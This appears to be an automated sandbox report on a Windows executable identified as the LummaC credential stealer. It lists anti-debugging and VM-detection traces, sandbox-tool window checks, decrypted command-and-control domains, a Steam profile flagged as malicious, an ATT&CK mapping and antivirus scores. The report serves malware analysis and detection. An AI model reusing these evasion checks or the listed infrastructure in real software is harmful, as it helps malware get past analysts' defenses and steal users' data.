Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB8078 second address: BB809E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pushad 0x00000008 jmp 00007F5E78823266h 0x0000000d jg 00007F5E7882325Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB809E second address: BB80A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB80A6 second address: BB80AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC1018 second address: BC101C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC101C second address: BC1022 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC7480 second address: BC748C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC748C second address: BC7492 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD4AAF second address: BD4ACE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E792621F5h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD4ACE second address: BD4ADC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F5E78823256h 0x0000000a popad 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD7F67 second address: BD7F6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD7F6D second address: BD7F8F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E78823264h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jc 00007F5E7882325Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF1756 second address: BF175C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF175C second address: BF176F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jnp 00007F5E7882325Ah 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF176F second address: BF1775 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF1775 second address: BF177B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF177B second address: BF177F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF0977 second address: BF097B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF097B second address: BF0981 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF0981 second address: BF099B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F5E7882325Ch 0x0000000c jnl 00007F5E78823256h 0x00000012 js 00007F5E7882325Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF0ABA second address: BF0AC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF2D8E second address: BF2D92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF59D0 second address: BF59D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF8BC3 second address: BF8BCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop eax 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF870C second address: BF8710 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF8710 second address: BF872F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F5E78823269h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF872F second address: BF8746 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E792621F3h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0CC2 second address: 50A0CC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0CC6 second address: 50A0CCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0CCC second address: 50A0D38 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E7882325Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F5E7882325Eh 0x00000012 sub si, 8428h 0x00000017 jmp 00007F5E7882325Bh 0x0000001c popfd 0x0000001d pushfd 0x0000001e jmp 00007F5E78823268h 0x00000023 sbb ecx, 00243688h 0x00000029 jmp 00007F5E7882325Bh 0x0000002e popfd 0x0000002f popad 0x00000030 je 00007F5EE91F9288h 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0D38 second address: 50A0D42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edx, 5C3AD164h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0D42 second address: 50A0D5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E78823269h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0D5F second address: 50A0D89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E792621F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test byte ptr [eax+04h], 00000005h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F5E792621EDh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0D89 second address: 50A0D8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0F073 second address: B0F079 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0F079 second address: B0F095 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jns 00007F5E78823258h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F5E7882325Bh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B0EB9 second address: 50B0EBE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B0F16 second address: 50B0F1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B0F1A second address: 50B0F1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B0F1E second address: 50B0F24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 963E51 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 963F0A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: B156D7 instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\file.exe TID: 1360

Thread sleep time: -30000s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\Desktop\file.exe

Last function: Thread delayed

Source: file.exe, file.exe, 00000000.00000002.2240502965.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Amcache.hve.4.dr	Binary or memory string: VMware
Source: Amcache.hve.4.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.4.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.4.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.4.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.4.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.4.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.4.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: file.exe, 00000000.00000003.2072962019.00000000010F3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2249500388.00000000010F3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2079771771.00000000010FC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2249500388.000000000106E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2073078015.00000000010FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.4.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.4.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.4.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.4.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.4.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.4.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.4.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.4.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.4.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.4.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.4.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.4.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.4.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.4.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.4.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.4.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.4.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.4.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.4.dr	Binary or memory string: VMware Virtual RAM
Source: file.exe, 00000000.00000002.2249500388.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072962019.00000000010C6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWL
Source: Amcache.hve.4.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: file.exe, 00000000.00000002.2240502965.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: Amcache.hve.4.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\file.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\file.exe	File opened: NTICE
Source: C:\Users\user\Desktop\file.exe	File opened: SICE
Source: C:\Users\user\Desktop\file.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_009400D0 LdrInitializeThunk,

0_2_009400D0

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: file.exe	String found in binary or memory: licendfilteo.site
Source: file.exe	String found in binary or memory: clearancek.site
Source: file.exe	String found in binary or memory: bathdoomgaz.stor
Source: file.exe	String found in binary or memory: spirittunek.stor
Source: file.exe	String found in binary or memory: dissapoiznw.stor
Source: file.exe	String found in binary or memory: studennotediw.stor
Source: file.exe	String found in binary or memory: mobbipenju.stor
Source: file.exe	String found in binary or memory: eaglepawnoy.stor

Source: file.exe, file.exe, 00000000.00000002.2240926529.0000000000B2A000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: '&o&Program Manager
Source: file.exe, 00000000.00000002.2240926529.0000000000B2A000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: o'&o&Program Manager

Source: C:\Users\user\Desktop\file.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.4.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.4.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.4.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.4.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	2 Process Injection	24 Virtualization/Sandbox Evasion	OS Credential Dumping	641 Security Software Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 DLL Side-Loading	2 Process Injection	LSASS Memory	24 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	Logon Script (Windows)	11 Deobfuscate/Decode Files or Information	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	3 Obfuscated Files or Information	NTDS	223 System Information Discovery	Distributed Component Object Model	Input Capture	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	12 Software Packing	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	41%	Virustotal		Browse
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Link
steamcommunity.com	0%	Virustotal	Browse
sergei-esenin.com	18%	Virustotal	Browse
spirittunek.store	22%	Virustotal	Browse
licendfilteo.site	16%	Virustotal	Browse
studennotediw.store	18%	Virustotal	Browse
eaglepawnoy.store	19%	Virustotal	Browse
bathdoomgaz.store	22%	Virustotal	Browse
mobbipenju.store	22%	Virustotal	Browse
dissapoiznw.store	22%	Virustotal	Browse
clearancek.site	18%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://player.vimeo.com	0%	URL Reputation	safe
https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd7fb65801182a5f	0%	URL Reputation	safe
https://store.steampowered.com/subscriber_agreement/	0%	URL Reputation	safe
https://www.gstatic.cn/recaptcha/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	0%	URL Reputation	safe
http://www.valvesoftware.com/legal.htm	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&	0%	URL Reputation	safe
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL	0%	URL Reputation	safe
https://steam.tv/	0%	URL Reputation	safe
https://steamcommunity.com/profiles/76561199724331900	100%	URL Reputation	malware
https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english	0%	URL Reputation	safe
http://store.steampowered.com/privacy_agreement/	0%	URL Reputation	safe
https://store.steampowered.com/points/shop/	0%	URL Reputation	safe
https://lv.queniujq.cn	0%	URL Reputation	safe
https://steamcommunity.com/profiles/76561199724331900/inventory/	100%	URL Reputation	malware
https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg	0%	URL Reputation	safe
https://store.steampowered.com/privacy_agreement/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am	0%	URL Reputation	safe
https://checkout.steampowered.com/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png	0%	URL Reputation	safe
https://avatars.akamai.steamstatic	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC	0%	URL Reputation	safe
https://store.steampowered.com/;	0%	URL Reputation	safe
https://store.steampowered.com/about/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english	0%	URL Reputation	safe
https://help.steampowered.com/en/	0%	URL Reputation	safe
https://store.steampowered.com/news/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/	0%	URL Reputation	safe
http://store.steampowered.com/subscriber_agreement/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1	0%	URL Reputation	safe
https://recaptcha.net/recaptcha/;	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en	0%	URL Reputation	safe
https://store.steampowered.com/stats/	0%	URL Reputation	safe
https://medal.tv	0%	URL Reputation	safe
https://broadcast.st.dl.eccdnx.com	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1	0%	URL Reputation	safe
https://store.steampowered.com/steam_refunds/	0%	URL Reputation	safe
https://login.steampowered.com/	0%	URL Reputation	safe
https://store.steampowered.com/legal/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl	0%	URL Reputation	safe
https://recaptcha.net	0%	URL Reputation	safe
http://upx.sf.net	0%	URL Reputation	safe
https://store.steampowered.com/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016	0%	URL Reputation	safe
https://www.cloudflare.com/learning/access-management/phishing-attack/	0%	Virustotal		Browse
https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp	0%	Virustotal		Browse
https://steamcommunity.com/?subsection=broadcasts	0%	Virustotal		Browse
https://sergei-esenin.com/	0%	Virustotal		Browse
studennotediw.store	18%	Virustotal		Browse
https://www.google.com	0%	Virustotal		Browse
https://www.youtube.com	0%	Virustotal		Browse
https://steamcommunity.com/d	0%	Virustotal		Browse
eaglepawnoy.store	19%	Virustotal		Browse
https://sketchfab.com	0%	Virustotal		Browse
https://www.cloudflare.com	0%	Virustotal		Browse
dissapoiznw.store	22%	Virustotal		Browse
https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=hgPi	0%	Virustotal		Browse
https://www.cloudflare.com/5xx-error-landing	0%	Virustotal		Browse
https://sergei-esenin.com:443/api	19%	Virustotal		Browse
https://www.youtube.com/	0%	Virustotal		Browse
https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=2Ih2WOq7ErXY&a	0%	Virustotal		Browse
https://community.akamai.steamstatic.com/public/share	0%	Virustotal		Browse
https://sergei-esenin.com/pi	15%	Virustotal		Browse
https://www.google.com/recaptcha/	0%	Virustotal		Browse
https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/	0%	Virustotal		Browse
https://steamcommunity.com/my/wishlist/	0%	Virustotal		Browse
https://steamcommunity.com/market/	0%	Virustotal		Browse
https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org	0%	Virustotal		Browse
https://sergei-esenin.com/apiU	4%	Virustotal		Browse
bathdoomgaz.store	22%	Virustotal		Browse
https://steamcommunity.com/discussions/	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
steamcommunity.com	104.102.49.254	true	true	0%, Virustotal, Browse	unknown
sergei-esenin.com	172.67.206.204	true	true	18%, Virustotal, Browse	unknown
